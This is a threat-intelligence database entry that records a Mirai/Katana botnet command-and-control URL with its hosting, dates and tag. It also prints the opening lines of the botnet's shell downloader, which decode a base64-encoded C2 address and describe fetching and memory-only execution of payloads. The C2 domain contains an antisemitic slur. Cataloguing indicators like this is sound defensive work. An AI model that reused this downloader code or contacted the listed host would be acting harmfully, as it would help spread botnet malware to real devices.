ThreatFox IOC Database
You are viewing the ThreatFox database entry for url http://langec.jewmailer.net:7768.
Database Entry
| IOC ID: | 1893473 |
|---|---|
| IOC: | http://langec.jewmailer.net:7768 |
| IOC Type : | url |
| Threat Type : | botnet_cc |
| Malware: | Mirai |
| Malware alias: | Katana |
| Confidence Level : | Confidence level is high (100%) |
| Is compromised? : | False |
| ASN: | AS215136 Ryzehosting |
| Country: | AT |
| First seen: | 2026-09-03 05:39:43 UTC |
| Last seen: | never |
| UUID: | de58c3eb-a6f9-11f1-b569-42010aa4000a |
| Reporter | |
| Reward | 5 credits from ThreatFox |
| Tags: | AkataruBotnet |
BlinkzSec
#!/bin/sh# Akataru Botnet — Downloader
# Multi-arch downloader with HTTP→TFTP→FTP fallback, memfd execution.
C2_B64="bGFuZ2VjLmpld21haWxlci5uZXQ6Nzc2OA=="
C2_URL="$(echo "$C2_B64" | base64 -d 2>/dev/null | tr -d '\n')"
AT